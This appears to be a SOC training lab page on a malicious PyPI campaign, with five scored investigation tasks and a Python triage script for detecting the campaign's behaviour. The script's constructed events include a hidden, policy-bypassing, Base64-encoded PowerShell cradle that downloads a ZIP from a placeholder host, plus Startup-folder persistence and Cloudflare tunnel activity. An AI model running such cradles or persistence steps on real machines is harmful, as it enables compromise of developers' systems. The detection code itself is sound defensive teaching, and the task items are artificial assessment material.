Supply Chain Investigation: The poweRAT PyPI Campaign

Difficulty: Intermediate · Data sources: SIEM, XDR, Firewall

Investigate a sophisticated supply chain attack targeting Python developers through malicious PyPI packages. You will analyze a multi-stage infection chain involving obfuscated PowerShell, Cloudflare Tunnels, and a Flask-based RAT used for data exfiltration and remote control.

1h · 5 tasks · 150 points · Free

Start this operation

Create your free account and begin immediately.

Get Early Access — Free

Free forever — no credit card required

Investigation Tasks

Complete each task by investigating alerts and submitting your findings.

Task 1: Identify Malicious Package Installation (20 points)
  Answer format: SOC{package_name}, the name of the malicious PyPI package. Hint available.

Task 2: Analyze PowerShell Download Cradle (30 points)
  Answer format: SOC{url}, the full URL of the ZIP file download. Hint available.

Task 3: Detect Persistence Mechanism (25 points)
  Answer format: SOC{filename.lnk}, the name of the persistence file. Hint available.

Task 4: Investigate Tunneling Activity (40 points)
  Answer format: SOC{domain.com}, the legitimate domain used for tunneling. Hint available.

Task 5: Trace Data Exfiltration (35 points)
  Answer format: SOC{ip_address}, the IP address associated with the exfiltration service. Hint available.

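As an added illustration of how the five tasks chain together when worked from raw telemetry, here is a small Python triage pass over constructed XDR (process and file), SIEM (DNS) and firewall (connection) events. It is example code written for this page, not the platform's own tooling or anything from the campaign itself: every event, package name, URL, file name, domain and IP address in it is an invented placeholder and is not an IOC or a task answer. The tunnel-service suffix list is an assumption to adjust for your environment, and the correlation rules (pip install followed by PowerShell from the interpreter, a .lnk dropped into a Startup folder, DNS under a tunnel domain, a large outbound transfer from a scripting host) are the generic checks an analyst would start from.

```python
"""Added example: cross-source triage mirroring the five tasks above.
Illustrative code for this page, not the platform's. All events are
constructed; names, URLs, domains and IPs are placeholders, not IOCs."""
import base64
import re
from datetime import datetime, timedelta

# Stage-2 cradle carried by the sample PowerShell event, encoded the way
# -EncodedCommand expects (UTF-16LE, then Base64). Constructed, not real.
STAGE2_SCRIPT = ("Invoke-WebRequest -Uri http://files.example.invalid/updates/pkg.zip "
                 "-OutFile $env:TEMP\\pkg.zip; Expand-Archive $env:TEMP\\pkg.zip $env:TEMP\\pkg")
ENC = base64.b64encode(STAGE2_SCRIPT.encode("utf-16le")).decode()

# Constructed events from one developer host, in time order.
EVENTS = [
    {"src": "xdr", "ts": "2024-03-01T09:00:00", "host": "dev01", "type": "process",
     "image": "pip.exe", "parent": "cmd.exe", "cmd": "pip install demo-utils-typo"},
    {"src": "xdr", "ts": "2024-03-01T09:00:04", "host": "dev01", "type": "process",
     "image": "powershell.exe", "parent": "python.exe",
     "cmd": f"powershell.exe -w hidden -ep bypass -enc {ENC}"},
    {"src": "xdr", "ts": "2024-03-01T09:00:09", "host": "dev01", "type": "file",
     "image": "powershell.exe", "path": "C:\\Users\\dev\\AppData\\Roaming\\Microsoft\\Windows"
     "\\Start Menu\\Programs\\Startup\\Updater.lnk"},
    {"src": "xdr", "ts": "2024-03-01T09:00:15", "host": "dev01", "type": "process",
     "image": "cloudflared.exe", "parent": "powershell.exe",
     "cmd": "cloudflared.exe tunnel --url http://localhost:5000"},
    {"src": "siem", "ts": "2024-03-01T09:00:16", "host": "dev01", "type": "dns",
     "query": "lab-demo-1234.trycloudflare.com"},
    {"src": "fw", "ts": "2024-03-01T09:01:00", "host": "dev01", "type": "conn",
     "image": "python.exe", "dst_ip": "198.51.100.23", "dst_port": 443, "bytes_out": 2_450_000},
    {"src": "fw", "ts": "2024-03-01T09:01:05", "host": "dev01", "type": "conn",
     "image": "chrome.exe", "dst_ip": "203.0.113.9", "dst_port": 443, "bytes_out": 12_000},
]

# Assumed tunnel-service domains (Cloudflare Tunnel endpoints); extend per environment.
TUNNEL_SUFFIXES = ("trycloudflare.com", "argotunnel.com")


def _ts(e):
    return datetime.fromisoformat(e["ts"])


def malicious_package(events, window=timedelta(seconds=60)):
    """Task 1: a pip install followed within `window` by PowerShell spawned from the
    interpreter on the same host. A setup.py has no business launching PowerShell."""
    for inst in (e for e in events if e.get("image") == "pip.exe" and "install" in e.get("cmd", "")):
        for e in events:
            if (e.get("image") == "powershell.exe" and e.get("parent") in ("python.exe", "pip.exe")
                    and e["host"] == inst["host"] and timedelta(0) <= _ts(e) - _ts(inst) <= window):
                return inst["cmd"].split()[-1]  # package named on the install line
    return None


def decode_cradle(cmd):
    """Task 2: recover the script behind -enc/-EncodedCommand and extract the ZIP URL."""
    m = re.search(r"-(?:enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmd, re.I)
    script = base64.b64decode(m.group(1)).decode("utf-16le") if m else cmd
    url = re.search(r"https?://[^\s'\"]+\.zip", script, re.I)
    return script, (url.group(0) if url else None)


def persistence_lnk(events):
    """Task 3: a shortcut written into a per-user or all-users Startup folder."""
    for e in events:
        path = e.get("path", "")
        if e.get("type") == "file" and "\\Start Menu\\Programs\\Startup\\" in path \
                and path.lower().endswith(".lnk"):
            return path.rsplit("\\", 1)[-1]
    return None


def tunnel_domain(events):
    """Task 4: DNS lookups under a tunnel-service domain (any subdomain counts)."""
    for e in events:
        q = e.get("query", "").lower().rstrip(".")
        for suffix in TUNNEL_SUFFIXES:
            if q == suffix or q.endswith("." + suffix):
                return suffix
    return None


def exfil_destination(events, min_bytes=1_000_000):
    """Task 5: the largest outbound transfer made by a scripting host or tunnel client."""
    conns = [e for e in events if e.get("type") == "conn" and e.get("bytes_out", 0) >= min_bytes
             and e.get("image") in ("python.exe", "powershell.exe", "cloudflared.exe")]
    return max(conns, key=lambda e: e["bytes_out"])["dst_ip"] if conns else None


def triage(events):
    """Run all five checks and return the findings that fill the SOC{...} answer fields."""
    ps = next((e for e in events if e.get("image") == "powershell.exe" and e.get("type") == "process"), None)
    _, zip_url = decode_cradle(ps["cmd"]) if ps else ("", None)
    return {
        "package": malicious_package(events),
        "zip_url": zip_url,
        "persistence": persistence_lnk(events),
        "tunnel_domain": tunnel_domain(events),
        "tunnel_client_seen": any(e.get("image") == "cloudflared.exe" for e in events),
        "exfil_ip": exfil_destination(events),
    }


if __name__ == "__main__":
    for key, value in triage(EVENTS).items():
        print(f"{key:20} {value}")
```

The point of the correlation, rather than five independent searches, is the parent-child link: the PowerShell event is only interesting because its parent is the Python interpreter that pip just ran, and the tunnel client and the large outbound transfer only matter because they follow from that same process tree on the same host. When adapting this to real SIEM or XDR exports, keep the host and parent-process fields in the join; a Startup-folder .lnk or a DNS lookup for a tunnel domain on its own is a weak signal that legitimate developer tooling also produces.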

Skills You'll Build

  • Investigating realistic security alerts
  • SIEM log analysis
  • XDR log analysis
  • Firewall log analysis
  • MITRE ATT&CK technique identification
  • Triage decisions: escalate, investigate, or close
  • Evidence collection and documentation
  • Job-ready incident response methodology
Difficulty: Intermediate. Requires foundational alert triage skills; findings must be correlated across multiple data sources (SIEM, XDR and firewall logs).

Prerequisites

  • Basic understanding of security alerts
  • Familiarity with SIEM concepts
  • Familiarity with XDR concepts
  • Familiarity with Firewall concepts
